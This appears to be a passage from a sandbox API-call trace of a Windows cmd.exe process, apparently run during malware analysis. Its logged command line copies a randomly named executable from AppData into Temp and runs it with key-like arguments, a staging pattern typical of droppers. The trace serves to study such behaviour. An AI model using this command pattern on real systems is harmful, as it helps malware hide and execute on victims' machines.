"\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23732 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23733 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23734 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23735 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 23736 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23737 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23738 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23739 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23740 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 23741 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23916 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23917 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23918 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23919 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 23920 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 23921 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23922 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23923 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23924 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23925 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23926 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23927 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23928 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23929 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23930 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 23931 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23932 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23933 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23934 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23935 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23936 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23937 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 23938 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 23939 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 23950 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 408 os_tid = 0x968 [0174.017] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0x9d9f2ba0, dwHighDateTime=0x1d440a9)) [0174.017] GetCurrentProcessId () returned 0xaa0 [0174.017] GetCurrentThreadId () returned 0x968 [0174.017] GetTickCount () returned 0x32a3a [0174.017] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=23080604308) returned 1 [0174.017] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0174.017] __set_app_type (_Type=0x1) [0174.017] __p__fmode () returned 0x76b331f4 [0174.017] __p__commode () returned 0x76b331fc [0174.018] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0174.018] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0174.018] GetCurrentThreadId () returned 0x968 [0174.018] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x968) returned 0x38 [0174.018] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.018] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0174.018] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.018] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0174.018] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18feec | out: phkResult=0x18feec*=0x0) returned 0x2 [0174.018] VirtualQuery (in: lpAddress=0x18ff23, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.018] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0174.018] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0174.018] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.018] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0174.018] GetConsoleOutputCP () returned 0x1b5 [0174.019] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.019] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0174.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.019] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0174.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.019] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0174.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.019] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0174.019] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.019] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0174.019] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.019] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0174.019] GetEnvironmentStringsW () returned 0x330370* [0174.020] FreeEnvironmentStringsW (penv=0x330370) returned 1 [0174.020] GetEnvironmentStringsW () returned 0x330370* [0174.020] FreeEnvironmentStringsW (penv=0x330370) returned 1 [0174.020] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee5c | out: phkResult=0x18ee5c*=0x40) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x20, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x1, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x1, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x0, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x40, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x40, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x40, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegCloseKey (hKey=0x40) returned 0x0 [0174.020] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee5c | out: phkResult=0x18ee5c*=0x40) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x40, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x1, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x1, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x0, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x9, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x9, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x9, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegCloseKey (hKey=0x40) returned 0x0 [0174.021] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0174.021] srand (_Seed=0x5b886389) [0174.021] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.021] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.021] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.021] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0174.021] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0174.021] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0174.021] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.021] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0174.021] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0174.021] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0174.021] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0174.021] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0174.021] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0174.021] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0174.021] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0174.021] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0174.022] GetEnvironmentStringsW () returned 0x3324c0* [0174.022] FreeEnvironmentStringsW (penv=0x3324c0) returned 1 [0174.022] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.022] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.022] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0174.022] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0174.022] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0174.022] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0174.022] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0174.022] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0174.022] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0174.022] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0174.022] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.022] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fc28, lpFilePart=0x18fc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fc24*="Desktop") returned 0x18 [0174.022] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0174.022] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f9a4 | out: lpFindFileData=0x18f9a4) returned 0x330b50 [0174.022] FindClose (in: hFindFile=0x330b50 | out: hFindFile=0x330b50) returned 1 [0174.022] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f9a4 | out: lpFindFileData=0x18f9a4) returned 0x330b50 [0174.022] FindClose (in: hFindFile=0x330b50 | out: hFindFile=0x330b50) returned 1 [0174.022] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f9a4 | out: lpFindFileData=0x18f9a4) returned 0x330b50 [0174.023] FindClose (in: hFindFile=0x330b50 | out: hFindFile=0x330b50) returned 1 [0174.023] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0174.023] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0174.023] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0174.023] GetEnvironmentStringsW () returned 0x330370* [0174.023] FreeEnvironmentStringsW (penv=0x330370) returned 1 [0174.023] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.023] GetConsoleOutputCP () returned 0x1b5 [0174.023] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.023] GetUserDefaultLCID () returned 0x409 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd68, cchData=128 | out: lpLCData="0") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fd68, cchData=128 | out: lpLCData="0") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fd68, cchData=128 | out: lpLCData="1") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0174.024] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0174.025] GetConsoleTitleW (in: lpConsoleTitle=0x320a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.025] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.025] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0174.025] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0174.025] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0174.026] _wcsicmp (_String1="type", _String2=")") returned 75 [0174.026] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0174.026] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0174.026] _wcsicmp (_String1="IF", _String2="type") returned -11 [0174.026] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0174.026] _wcsicmp (_String1="REM", _String2="type") returned -2 [0174.026] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0174.030] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 68 [0174.030] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 68 [0174.030] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 71 [0174.030] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 71 [0174.030] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 80 [0174.030] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 80 [0174.032] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.032] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.032] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.032] GetFileType (hFile=0x7) returned 0x2 [0174.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0174.032] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fbfc | out: lpMode=0x18fbfc) returned 1 [0174.033] _dup (_FileHandle=1) returned 3 [0174.033] _close (_FileHandle=1) returned 0 [0174.033] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", _String2="con") returned -53 [0174.033] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18fbcc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0174.034] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0174.034] GetConsoleTitleW (in: lpConsoleTitle=0x18f9fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.099] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0174.099] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0174.099] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0174.099] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0174.099] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.100] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x18f560, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f560) returned 0x320f58 [0174.100] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0174.100] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0174.100] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0174.100] CreateFileW 